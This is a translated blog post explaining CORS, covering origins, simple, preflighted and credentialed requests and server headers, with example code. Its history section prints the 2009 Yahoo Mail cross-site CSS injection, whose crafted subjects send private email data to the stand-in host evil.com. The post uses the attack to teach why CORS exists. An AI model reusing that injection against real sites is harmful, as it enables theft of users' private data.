What is CORS?

hyeongjundev · March 12, 2022

🚨 Access to fetch at 'https://api.lubycon.com/me' from origin 'http://localhost:3000' has been blocked by CORS policy: No 'Access-Control-Allow-Origin' header is present on the requested resource. If an opaque response serves your needs, set the request's mode to 'no-cors' to fetch the resource with CORS disabled.

If you do any development, this is a message you have probably run into at least once.
It says the request violated CORS and suggests a fix: either modify the 'Access-Control-Allow-Origin' header or make a request that does not need CORS.

So what is CORS?

One of the best ways to understand a concept is to find out why it came into being.

Why did CORS come about?

For nearly 30 years browsers have been able to include images from other sites. They could simply do it, with no need for the other site's permission. And not only images: other resources could be fetched the same way.

<script src="…"></script>
<link rel="stylesheet" href="…" />
<iframe src="…"></iframe>
<video src="…"></video>
<audio src="…"></audio>

But this started to get complicated in 1994 with the arrival of HTTP cookies, because authentication information was now included in the HTTP headers.

The server uses the authentication information in the HTTP headers to identify the user.

Attackers began looking for vulnerabilities that exploit this property. As a result, a vulnerability in Yahoo Mail came to light in 2009.

First, the attacker sends the user an email whose subject contains ');} and then sends an email whose subject contains {}html{background:url('//evil.com/?

The emails will then be delivered in a structure like the one below.

…
<li class="email-subject">Hey {}html{background:url('//evil.com/?</li>
<li class="email-subject">…private data…</li>
<li class="email-subject">…private data…</li>
<li class="email-subject">…private data…</li>
<li class="email-subject">Yo ');}</li>
…

In the structure above, the code the attacker wants executed sits sandwiched between pieces that parse as valid CSS.

Next, the attacker lures the user into visiting a page that contains the following.

<link rel="stylesheet" href="https://m.yahoo.com/mail" />

When that resource is loaded using yahoo.com's cookies, the CSS parser parses the email subjects planted beforehand and ends up sending the private information to evil.com.

This is only one of many problems that can arise when access across different sites is allowed.

So, what is CORS?

We saw above that allowing access across different sites causes problems. CORS is one of the ways to solve them.

CORS is defined as follows.

Cross-Origin Resource Sharing (CORS) is a mechanism that uses additional HTTP headers to tell the browser to give a web application running at one origin permission to access selected resources from a different origin.

Put simply, CORS is used only in browsers, and it is a policy under which only the same origin and the origins the server has allowed can access a resource.

Origin?

The term "origin" comes up a lot. What is an origin?

The URLs we commonly see, such as www.google.com, are made up of several components.

Of those components, the origin is the combination of scheme, host and port.
The table below shows which URLs count as the same origin as https://evan-moon.github.io.

| URL | Same origin | Reason |
| --- | --- | --- |
| https://evan-moon.github.io/about | O | Scheme, host and port are identical |
| https://evan-moon.github.io/about?q=안뇽 | O | Scheme, host and port are identical |
| https://user:password@evan-moon.github.io | O | Scheme, host and port are identical |
| http://evan-moon.github.io | X | Scheme differs |
| https://api.github.io | X | Host differs |
| https://evan-moon.naver.com | X | Host differs |
| https://evan-moon.github.com | X | Host differs |
| https://evan-moon.github.io:8000 | ? | Depends on the browser implementation |

When and how is CORS used?

So when and how does CORS come into play?

Requests that use CORS

CORS applies to the following HTTP requests.

  • Calls to XMLHttpRequest or the Fetch API
  • Web fonts
  • WebGL textures
  • Image/video frames drawn to a canvas using drawImage()
  • CSS Shapes from images

CORS scenarios

There are three CORS-related scenarios in total.

Simple Request

Requests that meet certain conditions do not need CORS. We call such a request a Simple Request.

The conditions for a Simple Request are as follows.

  • The method is one of GET, HEAD or POST
  • Apart from the headers the user agent sets automatically, the only headers that may be set manually are:
    • Accept, Accept-Language, Content-Language, Content-Type
  • The allowed media types are:
    • application/x-www-form-urlencoded, multipart/form-data, text/plain
  • If the request was made with XMLHttpRequest, no event listeners may be registered.
  • No ReadableStream object may be used in the request.

const xhr = new XMLHttpRequest();
const url = 'https://bar.other/resources/public-data/';

xhr.open('GET', url);
xhr.onreadystatechange = someHandler;
xhr.send();

GET /resources/public-data/ HTTP/1.1
Host: bar.other
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Connection: keep-alive
Origin: https://foo.example

Preflighted requests

Unlike a simple request, an HTTP request using the OPTIONS method is sent before the actual request to check whether the actual request is safe.

const xhr = new XMLHttpRequest();
xhr.open('POST', 'https://bar.other/resources/post-here/');
xhr.setRequestHeader('X-PINGOTHER', 'pingpong');
xhr.setRequestHeader('Content-Type', 'application/xml');
xhr.onreadystatechange = handler;
xhr.send('<person><name>Arun</name></person>');

OPTIONS /doc HTTP/1.1
Host: bar.other
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Connection: keep-alive
Origin: https://foo.example
Access-Control-Request-Method: POST
Access-Control-Request-Headers: X-PINGOTHER, Content-Type

HTTP/1.1 204 No Content
Date: Mon, 01 Dec 2008 01:15:39 GMT
Server: Apache/2
Access-Control-Allow-Origin: https://foo.example
Access-Control-Allow-Methods: POST, GET, OPTIONS
Access-Control-Allow-Headers: X-PINGOTHER, Content-Type
Access-Control-Max-Age: 86400
Vary: Accept-Encoding, Origin
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive

Lines 1-10 are the preflight request. Through the preflight, the browser checks whether the actual request is possible. The preflight also sends, in advance, the information needed for the actual request (lines 9-10).

Access-Control-Request-Method carries the method, and Access-Control-Request-Headers carries information about the custom headers of the actual request.

Lines 13-22 are the response returned by the server. Access-Control-Allow-Origin contains https://foo.example.

Description of the Access-Control-* headers

The request and response for the actual request are as follows.

POST /doc HTTP/1.1
Host: bar.other
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Connection: keep-alive
X-PINGOTHER: pingpong
Content-Type: text/xml; charset=UTF-8
Referer: https://foo.example/examples/preflightInvocation.html
Content-Length: 55
Origin: https://foo.example
Pragma: no-cache
Cache-Control: no-cache

<person><name>Arun</name></person>

HTTP/1.1 200 OK
Date: Mon, 01 Dec 2008 01:15:40 GMT
Server: Apache/2
Access-Control-Allow-Origin: https://foo.example
Vary: Accept-Encoding, Origin
Content-Encoding: gzip
Content-Length: 235
Keep-Alive: timeout=2, max=99
Connection: Keep-Alive
Content-Type: text/plain

[Some XML payload]
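
The Simple Request conditions and the preflight trigger described above, as an added example (not code from the original post): `classifyRequest` is a hypothetical helper that applies the method, header and media-type conditions to the two XMLHttpRequest calls on this page and to two constructed requests. It does not model the XMLHttpRequest event-listener and ReadableStream conditions.

```javascript
// Added example: classifies a request using the Simple Request conditions listed on this page.
const SIMPLE_METHODS = new Set(['GET', 'HEAD', 'POST']);
const SIMPLE_HEADERS = new Set(['accept', 'accept-language', 'content-language', 'content-type']);
const SIMPLE_MEDIA_TYPES = new Set([
  'application/x-www-form-urlencoded',
  'multipart/form-data',
  'text/plain',
]);

// Returns { preflight, reasons } for a cross-origin request.
// `headers` holds only the headers the script set itself (setRequestHeader / fetch init).
function classifyRequest(method, headers = {}) {
  const reasons = [];
  if (!SIMPLE_METHODS.has(method.toUpperCase())) {
    reasons.push(`method ${method.toUpperCase()}`);
  }
  for (const [name, value] of Object.entries(headers)) {
    const lower = name.toLowerCase();
    if (!SIMPLE_HEADERS.has(lower)) {
      reasons.push(`header ${lower}`);
    } else if (lower === 'content-type') {
      // Compare only the media type; parameters such as charset do not matter.
      const mediaType = value.split(';')[0].trim().toLowerCase();
      if (!SIMPLE_MEDIA_TYPES.has(mediaType)) {
        reasons.push(`content-type ${mediaType}`);
      }
    }
  }
  return { preflight: reasons.length > 0, reasons };
}

// The two XMLHttpRequest calls from this page, plus two constructed cases.
const simpleGet = classifyRequest('GET');
const pingOther = classifyRequest('POST', {
  'X-PINGOTHER': 'pingpong',
  'Content-Type': 'application/xml',
});
const plainPost = classifyRequest('POST', { 'Content-Type': 'text/plain; charset=UTF-8' });
const jsonDelete = classifyRequest('DELETE', { 'Content-Type': 'application/json' });

console.log({ simpleGet, pingOther, plainPost, jsonDelete });
```

The constructed `text/plain` POST is sent without a preflight, so the server processes it before any CORS check happens in the browser; state-changing endpoints need their own request validation.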

Requests with credentials

A request that includes credentials is subject to stricter CORS rules.

By default, the AJAX APIs the browser provides, the XMLHttpRequest object and the fetch API, do not include cookie information or authentication-related headers in the request. The option that lets a request carry authentication-related information is the credentials option.

const invocation = new XMLHttpRequest();
const url = 'http://bar.other/resources/credentialed-content/';

function callOtherDomain() {
  if (invocation) {
    invocation.open('GET', url, true);
    invocation.withCredentials = true;
    invocation.onreadystatechange = handler;
    invocation.send();
  }
}

invocation.withCredentials is the flag that makes the request carry authentication information in cookies. The request above is a simple request, but the browser rejects any response that lacks the Access-Control-Allow-Credentials: true header.

GET /resources/credentialed-content/ HTTP/1.1
Host: bar.other
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Connection: keep-alive
Referer: http://foo.example/examples/credential.html
Origin: http://foo.example
Cookie: pageAccess=2


HTTP/1.1 200 OK
Date: Mon, 01 Dec 2008 01:34:52 GMT
Server: Apache/2
Access-Control-Allow-Origin: https://foo.example
Access-Control-Allow-Credentials: true
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: pageAccess=3; expires=Wed, 31-Dec-2008 01:34:53 GMT
Vary: Accept-Encoding, Origin
Content-Encoding: gzip
Content-Length: 106
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/plain


[text/plain payload]
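
One way a server can produce the Access-Control-* headers shown in the exchanges above, as an added example rather than code from the original post: `corsHeaders` and `POLICY` are hypothetical names, and the allowlist contents are an assumption. It compares the Origin header by exact match against an allowlist and approves a preflight only when the announced method and headers are permitted.

```javascript
// Added example (not from the original post): server-side CORS decision with an exact-match allowlist.
// POLICY mirrors the response headers shown on this page; the allowlist itself is an assumption.
const POLICY = {
  origins: new Set(['https://foo.example']),
  methods: ['POST', 'GET', 'OPTIONS'],
  headers: ['x-pingother', 'content-type'],
  credentials: true,
  maxAge: 86400,
};

const splitList = (v) => (v || '').split(',').map((s) => s.trim().toLowerCase()).filter(Boolean);

// `req` is { method, headers } with lower-cased header names. Returns the CORS
// response headers to add, or {} when the request must get none.
function corsHeaders(req, policy = POLICY) {
  const origin = req.headers['origin'];
  // Exact string comparison: no substring, suffix or regex matching, no reflecting any Origin.
  if (!origin || !policy.origins.has(origin)) return {};

  const out = { 'Access-Control-Allow-Origin': origin, 'Vary': 'Origin' };
  // With credentials the origin must be named explicitly; browsers do not accept "*".
  if (policy.credentials) out['Access-Control-Allow-Credentials'] = 'true';

  const wantedMethod = req.headers['access-control-request-method'];
  if (req.method === 'OPTIONS' && wantedMethod) {
    // Preflight: approve only if the announced method and headers are all allowed.
    const wantedHeaders = splitList(req.headers['access-control-request-headers']);
    const ok = policy.methods.includes(wantedMethod.toUpperCase()) &&
      wantedHeaders.every((h) => policy.headers.includes(h));
    if (!ok) return {};
    out['Access-Control-Allow-Methods'] = policy.methods.join(', ');
    out['Access-Control-Allow-Headers'] = policy.headers.join(', ');
    out['Access-Control-Max-Age'] = String(policy.maxAge);
  }
  return out;
}

// Constructed requests modelled on the exchanges shown on this page.
const preflight = corsHeaders({ method: 'OPTIONS', headers: {
  'origin': 'https://foo.example',
  'access-control-request-method': 'POST',
  'access-control-request-headers': 'X-PINGOTHER, Content-Type' } });
const lookalike = corsHeaders({ method: 'GET', headers: { origin: 'https://foo.example.evil.test' } });
const wrongScheme = corsHeaders({ method: 'GET', headers: { origin: 'http://foo.example' } });
console.log(preflight, lookalike, wrongScheme);
```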
